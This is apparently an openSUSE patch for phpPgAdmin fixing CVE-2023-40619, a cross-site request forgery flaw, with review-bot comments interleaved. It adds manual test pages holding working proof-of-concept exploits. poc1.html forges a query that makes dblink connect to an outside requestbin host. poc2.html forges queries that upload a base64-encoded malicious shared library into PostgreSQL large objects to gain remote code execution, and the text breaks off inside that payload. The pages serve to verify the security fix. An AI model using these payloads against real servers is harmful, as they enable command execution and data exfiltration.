034c444daf
Update to 7.14.6, Fix for CVE-2023-40619, boo#1215551 OBS-URL: https://build.opensuse.org/request/show/1123213 OBS-URL: https://build.opensuse.org/package/show/server:php:applications/phpPgAdmin?expand=0&rev=36
242 lines
20 KiB
Index: classes/Misc.php
|
|
===================================================================
|
|
--- classes/Misc.php.orig
|
|
+++ classes/Misc.php
|
|
@@ -1354,6 +1354,10 @@
|
|
echo '<div class="alert-banner"><p><a href="https://www.php.net/manual/en/session.configuration.php#ini.session.cookie-samesite" target="_blank" rel="noopener noreferrer">', htmlspecialchars($lang['sessionsecuritywarning']), '</a></p></div>';
|
|
}
|
|
|
|
+ if (!$conf['extra_session_security']) {
|
|
+ echo '<div class="alert-banner"><p><a href="http://phppgadmin.sourceforge.net/doku.php?id=faq#other_questions" target="_blank" rel="noopener noreferrer">', htmlspecialchars($lang['sessionsecuritywarning']), '</a></p></div>';
|
|
+ }
|
|
+
|
|
echo "<div class=\"topbar\"><table style=\"width: 100%\"><tr><td>";
|
|
|
|
if ($server_info && isset($server_info['platform']) && isset($server_info['username'])) {
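Review bot: The new check `if (!$conf['extra_session_security'])` reads the key unguarded, so a deployment whose config.inc.php predates this option gets a PHP undefined-index notice on every render in addition to the banner; `if (empty($conf['extra_session_security']))` treats a missing key as "feature off" without the notice. The added banner also reuses `$lang['sessionsecuritywarning']`, the same string the preceding banner (context lines at the top of the hunk) already prints for a different condition, so a user cannot tell which of the two problems applies; a separate language key with its own text, added to the lang files, would keep them distinguishable. The enclosing function starts and ends outside this hunk.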
|
|
Index: conf/config.inc.php-dist
|
|
===================================================================
|
|
--- conf/config.inc.php-dist.orig
|
|
+++ conf/config.inc.php-dist
|
|
@@ -98,6 +98,15 @@
|
|
// to this feature and will be vulnerable to CSRF attacks.
|
|
$conf['extra_session_security'] = true;
|
|
|
|
+ // If extra session security is true, then PHP's session cookies will have
|
|
+ // SameSite cookie flags set to prevent CSRF attacks. If you're using
|
|
+ // auto-start sessions, autostarted sessions will be destroyed and
|
|
+ // restarted with SameSite on. If this this solution is not acceptable for
|
|
+ // your situation, you will need to either turn off auot-start sessions, or
|
|
+ // turn off secure sessions. Versions of PHP below 7.3 do not have access
|
|
+ // to this feature and will be vulnerable to CSRF attacks.
|
|
+ $conf['extra_session_security'] = true;
|
|
+
|
|
// AutoComplete uses AJAX interaction to list foreign key values
|
|
// on insert fields. It currently only works on single column
|
|
// foreign keys. You can choose one of the following values:
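Review bot: The added block is a verbatim copy of the comment and assignment immediately above it (the context ends with the existing `$conf['extra_session_security'] = true;`), so the shipped config now sets the same option twice and documents it twice; drop the added lines rather than let two copies drift apart. If the duplicate is kept on purpose, the new comment carries two typos worth fixing: `auot-start` → `auto-start` and `If this this solution` → `If this solution`.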
|
|
Index: tests/manual/issue-94/README.md
|
|
===================================================================
|
|
--- /dev/null
|
|
+++ tests/manual/issue-94/README.md
|
|
@@ -0,0 +1,42 @@
|
|
+# Testing CSRF vulnerabilities (Issue #94)
|
|
+
|
|
+How to test:
|
|
+
|
|
+1. Start phppgadmin:
|
|
+
|
|
+```
|
|
+$ cd /path/to/phppgadmin
|
|
+$ php -S localhost:8000
|
|
+```
|
|
+
|
|
+2. Set up a testing domain in /etc/hosts:
|
|
+
|
|
+```
|
|
+127.0.0.1 localhost2
|
|
+```
|
|
+
|
|
+3. Start the tests
|
|
+
|
|
+```
|
|
+$ cd /path/to/phppgadmin/tests/manual/issue-94
|
|
+$ php -S localhost2:8001
|
|
+```
|
|
+
|
|
+4. Open both sites in the same browser (different windows or tabs):
|
|
+
|
|
+```
|
|
+http://localhost:8000
|
|
+```
|
|
+
|
|
+```
|
|
+http://localhost2:8001
|
|
+```
|
|
+
|
|
+5. Log in to phppgadmin
|
|
+
|
|
+6. Run a test
|
|
+
|
|
+Choose a test from the list. Open your console, and click "Submit Request" -- you should see a CORS error, but the request should also appear in the network tab. Open it to see the response.
|
|
+
|
|
+If you see a login page, phppgadmin is protected. If not, phppgadmin is vulnerable.
|
|
+
|
|
Index: tests/manual/issue-94/index.html
|
|
===================================================================
|
|
--- /dev/null
|
|
+++ tests/manual/issue-94/index.html
|
|
@@ -0,0 +1,12 @@
|
|
+<html>
|
|
+<head>
|
|
+<title>Issue #94 (CSRF vulnerabilities) proof of concepts</title>
|
|
+</head>
|
|
+<body>
|
|
+<h1>Issue #94: CSRF vulnerabilities</h1>
|
|
+<ul>
|
|
+<li><a href="poc1.html">Proof of concept #1: out of band technique</a></li>
|
|
+<li><a href="poc2.html">Proof of concept #2: remote code execution</a></li>
|
|
+<ul>
|
|
+</body>
|
|
+</html>
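Review bot: The list opened with `<ul>` is never closed — the second `<ul>` just before `</body>` should be `</ul>`. Browsers recover from this silently, but a validator will flag it and any later styling of the list will behave unexpectedly. The page also has no doctype, so it renders in quirks mode; a leading `<!DOCTYPE html>` line is cheap.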
|
|
Index: tests/manual/issue-94/poc1.html
|
|
===================================================================
|
|
--- /dev/null
|
|
+++ tests/manual/issue-94/poc1.html
|
|
@@ -0,0 +1,48 @@
|
|
+<html>
|
|
+<body>
|
|
+<script>
|
|
+function submitRequest() {
|
|
+ var xhr = new XMLHttpRequest();
|
|
+ xhr.open("POST", "http:\/\/localhost:8000\/sql.php", true);
|
|
+ xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
|
|
+ xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
|
|
+ xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------317222262731323");
|
|
+ xhr.withCredentials = true;
|
|
+ var body = "-----------------------------317222262731323\r\n" +
|
|
+ "Content-Disposition: form-data; name=\"query\"\r\n" +
|
|
+ "\r\n" +
|
|
+ "CREATE EXTENSION dblink;\r\n" +
|
|
+ "SELECT dblink_connect(\'host=mydatahere.b940ab686a17804777c0.d.requestbin.net user=postgres password=password dbname=dvdrental\');\r\n" +
|
|
+ "-----------------------------317222262731323\r\n" +
|
|
+ "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +
|
|
+ "\r\n" +
|
|
+ "2097152\r\n" +
|
|
+ "-----------------------------317222262731323\r\n" +
|
|
+ "Content-Disposition: form-data; name=\"script\"; filename=\"\"\r\n" +
|
|
+ "Content-Type: application/octet-stream\r\n" +
|
|
+ "\r\n" +
|
|
+ "\r\n" + "-----------------------------317222262731323\r\n" +
|
|
+ "Content-Disposition: form-data; name=\"execute\"\r\n" +
|
|
+ "\r\n" +
|
|
+ "Execute\r\n" +
|
|
+ "-----------------------------317222262731323\r\n" +
|
|
+ "Content-Disposition: form-data; name=\"server\"\r\n" +
|
|
+ "\r\n" +
|
|
+ "localhost:5432:allow\r\n" +
|
|
+ "-----------------------------317222262731323\r\n" +
|
|
+ "Content-Disposition: form-data; name=\"database\"\r\n" +
|
|
+ "\r\n" +
|
|
+ "postgres\r\n" +
|
|
+ "-----------------------------317222262731323--\r\n";
|
|
+ var aBody = new Uint8Array(body.length);
|
|
+ for (var i = 0; i < aBody.length; i++) {
|
|
+ aBody[i] = body.charCodeAt(i);
|
|
+ }
|
|
+ xhr.send(new Blob([aBody]));
|
|
+}
|
|
+</script>
|
|
+<form action="#">
|
|
+ <input type="button" value="Submit request" onclick="submitRequest();" />
|
|
+</form>
|
|
+</body>
|
|
+</html>
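Review bot: These manual test pages (this file, poc2.html, index.html and the README under tests/manual/issue-94/) are added to the same source tree the package is built from; if the spec's install step copies the whole tree into the web root, the proof-of-concept pages end up reachable on the installed instance. Worth confirming that packaging excludes `tests/` (or that upstream marks it export-ignore) so they stay out of the shipped artifact. The pages also hard-code endpoints that are specific to the original author's environment (a requestbin host here, `192.168.1.81` in poc2.html); the README should name them as values to be replaced so a tester does not send traffic to a third party by accident. `submitRequest` is contained entirely within this hunk.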
|
|
Index: tests/manual/issue-94/poc2.html
|
|
===================================================================
|
|
--- /dev/null
|
|
+++ tests/manual/issue-94/poc2.html
|
|
@@ -0,0 +1,53 @@
|
|
+<html>
|
|
+<body>
|
|
+<script>history.pushState('', '', '/')</script> <script>
|
|
+ function submitRequest() {
|
|
+ var xhr = new XMLHttpRequest();
|
|
+ xhr.open("POST", "http:\/\/localhost:8000\/sql.php", true);
|
|
+ xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
|
|
+ xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
|
|
+ xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------297112967428312");
|
|
+ xhr.withCredentials = true;
|
|
+ var body = "-----------------------------297112967428312\r\n" +
|
|
+ "Content-Disposition: form-data; name=\"query\"\r\n" +
|
|
+ "\r\n" +
|
|
+ "SELECT lo_create(43213);\r\n" +
|
|
+ "INSERT INTO pg_largeobject (loid, pageno, data) values (43213, 0, decode(\'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\', \'base64\'));\r\n" +
|
|
+ "INSERT INTO pg_largeobject (loid, pageno, data) values (43213, 1, decode(\'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAGAAAAAAAAI AYAAAAAAAABAAAAAAAAAIcAAAAAAAAADAAAAAAAAABABQAAAAAAAA0AAAAAAAAAsAYAAAAAAAAZAAAAAAAAABAOIAAAAAAA GwAAAAAAAAAIAAAAAAAAABoAAAAAAAAAGA4gAAAAAAAcAAAAAAAAAAgAAAAAAAAA9f7/bwAAAADwAQAAAAAAAAUAAAAAAAA AiAMAAAAAAAAGAAAAAAAAADgCAAAAAAAACgAAAAAAAAC1AAAAAAAAAAsAAAAAAAAAGAAAAAAAAAADAAAAAAAAAAAQIAAAAA AAAgAAAAAAAAAYAAAAAAAAABQAAAAAAAAABwAAAAAAAAAXAAAAAAAAACgFAAAAAAAABwAAAAAAAACABAAAAAAAAAgAAAAAA AAAqAAAAAAAAAAJAAAAAAAAABgAAAAAAAAA/v//bwAAAABgBAAAAAAAAP///28AAAAAAQAAAAAAAADw//9vAAAAAD4EAAAA AAAA+f//bwAAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=\', \'base64\'));\r\n" +
|
|
+ "INSERT INTO pg_largeobject (loid, pageno, data) values (43213, 2, decode(\'IA4gAAAAAAAAAAAAAAAAAAAAAAAAAAAAdgUAAAAAAAAgECAAAAAAAEdDQzogKFVidW50dSA3LjMuMC0xNnVidW 50dTMpIDcuMy4wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwABAMgBAAAAAAAAAAAAAAAAAAAAAAAAAwACA PABAAAAAAAAAAAAAAAAAAAAAAAAAwADADgCAAAAAAAAAAAAAAAAAAAAAAAAAwAEAIgDAAAAAAAAAAAAAAAAAAAAAAAAAwAF AD4EAAAAAAAAAAAAAAAAAAAAAAAAAwAGAGAEAAAAAAAAAAAAAAAAAAAAAAAAAwAHAIAEAAAAAAAAAAAAAAAAAAAAAAAAAwA IACgFAAAAAAAAAAAAAAAAAAAAAAAAAwAJAEAFAAAAAAAAAAAAAAAAAAAAAAAAAwAKAGAFAAAAAAAAAAAAAAAAAAAAAAAAAw ALAIAFAAAAAAAAAAAAAAAAAAAAAAAAAwAMAJAFAAAAAAAAAAAAAAAAAAAAAAAAAwANALAGAAAAAAAAAAAAAAAAAAAAAAAAA wAOAMAGAAAAAAAAAAAAAAAAAAAAAAAAAwAPAOAGAAAAAAAAAAAAAAAAAAAAAAAAAwAQABgHAAAAAAAAAAAAAAAAAAAAAAAA AwARABAOIAAAAAAAAAAAAAAAAAAAAAAAAwASABgOIAAAAAAAAAAAAAAAAAAAAAAAAwATACAOIAAAAAAAAAAAAAAAAAAAAAA AAwAUAOAPIAAAAAAAAAAAAAAAAAAAAAAAAwAVAAAQIAAAAAAAAAAAAAAAAAAAAAAAAwAWACAQIAAAAAAAAAAAAAAAAAAAAA AAAwAXACgQIAAAAAAAAAAAAAAAAAAAAAAAAwAYAAAAAAAAAAAAAAAAAAAAAAABAAAABADx/wAAAAAAAAAAAAAAAAAAAAAMA AAAAgAMAJAFAAAAAAAAAAAAAAAAAAAOAAAAAgAMANAFAAAAAAAAAAAAAAAAAAAhAAAAAgAMACAGAAAAAAAAAAAAAAAAAAA3 AAAAAQAXACgQIAAAAAAAAQAAAAAAAABGAAAAAQASABgOIAAAAAAAAAAAAAAAAABtAAAAAgAMAGAGAAAAAAAAAAAAAAAAAAB 5AAAAAQARABAOIAAAAAAAAAAAAAAAAACYAAAABADx/wAAAAAAAAAAAAAAAAAAAACiAAAAAQAOAMAGAAAAAAAAHAAAAAAAAA C1AAAAAQAOANwGAAAAAAAABAAAAAAAAAABAAAABADx/wAAAAAAAAAAAAAAAAAAAADDAAAAAQAQANAHAAAAAAAAAAAAAAAAA AAAAAAABADx/wAAAAAAAAAAAAAAAAAAAADRAAAAAQAWACAQIAAAAAAAAAAAAAAAAADeAAAAAQATACAOIAAAAAAAAAAAAAAA AADnAAAAAAAPAOAGAAAAAAAAAAAAAAAAAAD6AAAAAQAWACgQIAAAAAAAAAAAAAAAAAAGAQAAAQAVAAAQIAAAAAAAAAAAAAA AAAAcAQAAEgAMAGoGAAAAAAAADQAAAAAAAAAqAQAAIAAAAAAAAAAAAAAAAAAAAAAAAABGAQAAEAAWACgQIAAAAAAAAAAAAA AAAABNAQAAEgANALAGAAAAAAAAAAAAAAAAAABTAQAAEgAAAAAAAAAAAAAAAAAAAAAAAABnAQAAIAAAAAAAAAAAAAAAAAAAA AAAAACQAQAAEgAMAIQGAAAAAAAAKgAAAAAAAAB2AQAAEAAXADAQIAAAAAAAAAAAAAAAAAB7AQAAEAAXACgQIAAAAAAAAAAA AAAAAACHAQAAEgAMAHcGAAAAAAAADQAAAAAAAACYAQAAIAAAAAAAAAAAAAAAAAAAAAAAAACyAQAAIgAAAAAAAAAAAAAAAAA 
AAAAAAADOAQAAEgAJAEAFAAAAAAAAAAAAAAAAAAAAY3J0c3R1ZmYuYwBkZXJlZ2lzdGVyX3RtX2Nsb25lcwBfX2RvX2dsb2 JhbF9kdG9yc19hdXgAY29tcGxldGVkLjc2OTYAX19kb19nbG9iYWxfZHRvcnNfYXV4X2ZpbmlfYXJyYXlfZW50cnkAZnJhb WVfZHVtbXkAX19mcmFtZV9kdW1teV9pbml0X2FycmF5X2VudHJ5AHBnX2V4ZWMuYwBQZ19tYWdpY19kYXRhLjQ3NzkAbXlf ZmluZm8uNDc4OABfX0ZSQU1FX0VORF9fAF9fZHNvX2hhbmRsZQBfRFlOQU1JQwBfX0dOVV9FSF9GUkFNRV9IRFIAX19UTUN fRU5EX18AX0dMT0JBTF9PRkZTRVRfVEFCTEVfAFBnX21hZ2ljX2Z1bmMAX0lUTV9kZXJlZ2lzdGVyVE1DbG9uZVRhYmxlAF 9lZGF0YQBfZmluaQBzeXN0ZW1AQEdMSUJDXzIuMi41AF9fZ21vbl9zdGFydF9fAF9lbmQAX19ic3Nfc3RhcnQAcGdfZmluZ m9fcGdfZXhlYwBfSVRNX3JlZ2lzdGVyVE1DbG9uZVRhYmxlAF9fY3hhX2ZpbmFsaXplQEBHTElCQ18yLjIuNQBfaW5pdAAA LnN5bXRhYgAuc3RydGFiAC5zaHN0cnRhYgAubm90ZS5nbnUuYnVpbGQtaWQALmdudS5oYXNoAC5keW5zeW0ALmR5bnN0cgA uZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbGEuZHluAC5yZWxhLnBsdAAuaW5pdAAucGx0Lmc=\', \'base64\'));\r\n" +
|
|
+ "INSERT INTO pg_largeobject (loid, pageno, data) values (43213, 3, decode(\'b3QALnRleHQALmZpbmkALnJvZGF0YQAuZWhfZnJhbWVfaGRyAC5laF9mcmFtZQAuaW5pdF9hcnJheQAuZmluaV 9hcnJheQAuZHluYW1pYwAuZ290LnBsdAAuZGF0YQAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbAAAABwAAAAIAAAAAAAAAyAEAAAAAAADIAQAAAAAA ACQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAALgAAAPb//28CAAAAAAAAAPABAAAAAAAA8AEAAAAAAABEAAAAAAA AAAMAAAAAAAAACAAAAAAAAAAAAAAAAAAAADgAAAALAAAAAgAAAAAAAAA4AgAAAAAAADgCAAAAAAAAUAEAAAAAAAAEAAAAAQ AAAAgAAAAAAAAAGAAAAAAAAABAAAAAAwAAAAIAAAAAAAAAiAMAAAAAAACIAwAAAAAAALUAAAAAAAAAAAAAAAAAAAABAAAAA AAAAAAAAAAAAAAASAAAAP///28CAAAAAAAAAD4EAAAAAAAAPgQAAAAAAAAcAAAAAAAAAAMAAAAAAAAAAgAAAAAAAAACAAAA AAAAAFUAAAD+//9vAgAAAAAAAABgBAAAAAAAAGAEAAAAAAAAIAAAAAAAAAAEAAAAAQAAAAgAAAAAAAAAAAAAAAAAAABkAAA ABAAAAAIAAAAAAAAAgAQAAAAAAACABAAAAAAAAKgAAAAAAAAAAwAAAAAAAAAIAAAAAAAAABgAAAAAAAAAbgAAAAQAAABCAA AAAAAAACgFAAAAAAAAKAUAAAAAAAAYAAAAAAAAAAMAAAAVAAAACAAAAAAAAAAYAAAAAAAAAHgAAAABAAAABgAAAAAAAABAB QAAAAAAAEAFAAAAAAAAFwAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAABzAAAAAQAAAAYAAAAAAAAAYAUAAAAAAABg BQAAAAAAACAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAAfgAAAAEAAAAGAAAAAAAAAIAFAAAAAAAAgAUAAAAAAAA IAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAIcAAAABAAAABgAAAAAAAACQBQAAAAAAAJAFAAAAAAAAHgEAAAAAAA AAAAAAAAAAABAAAAAAAAAAAAAAAAAAAACNAAAAAQAAAAYAAAAAAAAAsAYAAAAAAACwBgAAAAAAAAkAAAAAAAAAAAAAAAAAA AAEAAAAAAAAAAAAAAAAAAAAkwAAAAEAAAACAAAAAAAAAMAGAAAAAAAAwAYAAAAAAAAgAAAAAAAAAAAAAAAAAAAAEAAAAAAA AAAAAAAAAAAAAJsAAAABAAAAAgAAAAAAAADgBgAAAAAAAOAGAAAAAAAANAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAA AAACpAAAAAQAAAAIAAAAAAAAAGAcAAAAAAAAYBwAAAAAAALwAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAswAAAA 4AAAADAAAAAAAAABAOIAAAAAAAEA4AAAAAAAAIAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAL8AAAAPAAAAAwAAA AAAAAAYDiAAAAAAABgOAAAAAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAADLAAAABgAAAAMAAAAAAAAAIA4g AAAAAAAgDgAAAAAAAMABAAAAAAAABAAAAAAAAAAIAAAAAAAAABAAAAAAAAAAggAAAAEAAAADAAAAAAAAAOAPIAAAAAAA4A8 
